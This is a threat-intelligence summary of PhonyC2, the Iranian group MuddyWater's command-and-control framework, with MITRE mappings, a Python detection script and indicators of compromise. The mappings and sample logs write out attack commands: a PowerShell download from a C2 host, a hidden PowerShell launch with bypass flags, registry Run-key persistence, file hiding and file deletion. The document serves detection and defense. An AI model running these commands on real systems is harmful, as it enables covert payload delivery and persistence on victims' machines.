Deep Instinct researchers uncovered PhonyC2, a custom, continuously evolving C2 framework used by MuddyWater since 2021, including in an attack on the Technion and ongoing PaperCut exploitation. The analysis details the framework’s code, infection flow, persistence techniques, and MITRE technique mappings. #PhonyC2 #MuddyWater #Technion #PaperCut
Key points
- MuddyWater (aka Mango Sandstorm) operates under Iran’s MOIS and has introduced PhonyC2, a new C2 framework used since at least 2021.
- PhonyC2 was involved in the Technion Institute attack and is currently active in a PaperCut exploitation campaign.
- PhonyC2 is designed to be continuously updated to evade detection, with evolving TTPs documented across code leaks and investigations.
- The framework mirrors MuddyC3 in design and purpose, but is written in Python3 and features components like Please_Run_Once.py, main.py, webserver.py, and commandline.py.
- Initial access relies on social engineering; persistence and payload delivery leverage registry, PowerShell, and decoy/config mechanisms.
- MITRE ATT&CK techniques mapped to PhonyC2 include Web Protocols, Data Encoding, Ingress Tool Transfer, Boot/Startup Registry, PowerShell, Hidden Artifacts/Window, File Deletion, and Modify Registry.
- Indicative IOCs include multiple IPs, domains (e.g., 6nc*.co), and file hashes/names such as db.ps1, db.sqlite, and utils.jse.
MITRE Techniques
- [T1071.001] Application Layer Protocol: Web Protocols – PhonyC2 uses HTTP to download an obfuscated payload. Observable: http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
- [T1132.002] Data Encoding: Non-Standard Encoding – the PhonyC2 payload is obfuscated with a custom encoding. Observable (excerpt of the encoded payload): ,15555554155555554,14((1414,1554(14(,1554(14(,15415554,1554(14(,1414(,154((154,154154((,1554(154,1414(,14(14((,14((((14,154(14((,154(14((,1554(14(,154(1414,1554(154,1554(154,14(((((,1555414,14(((((,14((14(,15414(((,155414((,
- [T1105] Ingress Tool Transfer – PhonyC2 can download payloads from the C2 server. Observable: http://46.249.35[.]243:443/9b22685e-f173-4feb-95a4-c63daaf40c58.html?X9GFTRD6OZE=X9GFTRD6OZ
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – PhonyC2 can add a persistence mechanism. Observable: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NEW /d C:\intel\utils\utils.jse /f
- [T1059.001] Command and Scripting Interpreter: PowerShell – PhonyC2 is launched by PowerShell and executes PowerShell commands. Observable: powershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://172.16.162.1:1337/562a2ffe-a45a-4318-864b-5942fbd0a859.aspx?LY6EDE1KTNE=LY6EDE1KTNE -OutFile $input } -InputObject "c:\programdata\db.sqlite";sleep 6
- [T1564.001] Hide Artifacts: Hidden Files and Directories – PhonyC2 sets the hidden attribute on files in C:\ProgramData. Observable: attrib +h c:\programdata\db.sqlite
- [T1564.003] Hide Artifacts: Hidden Window – PhonyC2 is launched with the PowerShell window hidden. Observable: powershell -EP BYPASS -NoP -W 1
- [T1070.004] Indicator Removal: File Deletion – PhonyC2 deletes its files after execution. Observable: rm c:\programdata\db.sqlite ; rm c:\programdata\db.ps1
- [T1112] Modify Registry – PhonyC2 creates registry entries to achieve persistence. Observable: New-ItemProperty -Path "HKLM:\SOFTWARE\iCXqExISMHV" -Name "fmoopWgmBla" -Value '$p_id =…'
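As an added example (not code from the Deep Instinct report or from PhonyC2 itself), the Python below turns the observables listed above into command-line detection rules and runs them over a constructed set of process-creation log lines. It assumes command lines are logged with their full backslashed Windows paths; the sample lines are constructed, not real telemetry.

```python
import re

# Detection rules derived from the PhonyC2 observables mapped above. Each rule
# pairs an ATT&CK technique ID with a case-insensitive pattern evaluated against
# one process command line (e.g. a Sysmon Event ID 1 or Windows 4688 record).
RULES = [
    ("T1564.003", re.compile(r"\bpowershell(\.exe)?\b.*\s-W(indowStyle)?\s+(1|Hidden)\b", re.I)),
    ("T1059.001", re.compile(r"\bInvoke-WebRequest\b.*\s-OutFile\b", re.I)),
    ("T1105",     re.compile(r"\bInvoke-WebRequest\b.*\s-Uri\s+https?://", re.I)),
    ("T1547.001", re.compile(r"\breg\s+add\s+HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b", re.I)),
    ("T1564.001", re.compile(r"\battrib\s+\+h\s+c:\\programdata\\", re.I)),
    ("T1070.004", re.compile(r"\brm\s+c:\\programdata\\", re.I)),
    ("T1112",     re.compile(r"\bNew-ItemProperty\b.*\s-Path\s+[\"']?HKLM:\\SOFTWARE\\", re.I)),
]

def match_techniques(cmdline):
    """Return the technique IDs whose rule matches this command line, in rule order."""
    return [tid for tid, rx in RULES if rx.search(cmdline)]

def scan(log_lines):
    """Return (line_no, command_line, technique_ids) for every line that matches a rule."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        found = match_techniques(line)
        if found:
            hits.append((n, line, found))
    return hits

# Constructed sample telemetry: lines 1-6 mirror the page's observables, 7-8 are benign.
SAMPLE_LOG = [
    r"powershell -EP BYPASS -NoP -W 1",
    r"powershell Start-Job -ScriptBlock {Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing "
    r"-Uri http://172.16.162.1:1337/562a2ffe-a45a-4318-864b-5942fbd0a859.aspx -OutFile $input} "
    r'-InputObject "c:\programdata\db.sqlite"',
    r"attrib +h c:\programdata\db.sqlite",
    r"reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NEW /d C:\intel\utils\utils.jse /f",
    r"rm c:\programdata\db.sqlite ; rm c:\programdata\db.ps1",
    r'powershell New-ItemProperty -Path "HKLM:\SOFTWARE\iCXqExISMHV" -Name "fmoopWgmBla" -Value $p_id',
    r"powershell -NoProfile -File C:\scripts\backup.ps1",
    r"attrib +r c:\users\public\readme.txt",
]

if __name__ == "__main__":
    for n, line, techs in scan(SAMPLE_LOG):
        print(f"line {n}: {', '.join(techs)} <- {line[:60]}")
```

The patterns are deliberately narrow (they key on the exact paths and switches seen in this campaign); widen the path and switch alternatives before deploying them against your own telemetry.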
Indicators of Compromise
- [IP Address] PhonyC2 V6 (PaperCut) – 45.159.248[.]244, 91.121.240[.]104, and 195.20.17[.]44 (suspected PhonyC2)
- [IP Address] MuddyWater infrastructure / Technion activity – 45.86.230[.]20, 194.61.121[.]86, and 46.249.35[.]243
- [Domain] PhonyC2-related domains – 6nc051221c.co, 6nc110821hdb.co, am1211.iransos.me
- [File Hash] db.ps1 – 7cb0cc6800772e240a12d1b87f9b7561412f44f01f6bb38829e84acbc8353b9c; db.sqlite – 5ca26988b37e8998e803a95e4e7e3102fed16e99353d040a5b22aa7e07438fea; utils.jse – 1c95496da95ccb39d73dbbdf9088b57347f2c91cf79271ed4fe1e5da3e0e542a
- [File Name] db.ps1, db.sqlite, and utils.jse – files generated by PhonyC2 framework observed in investigations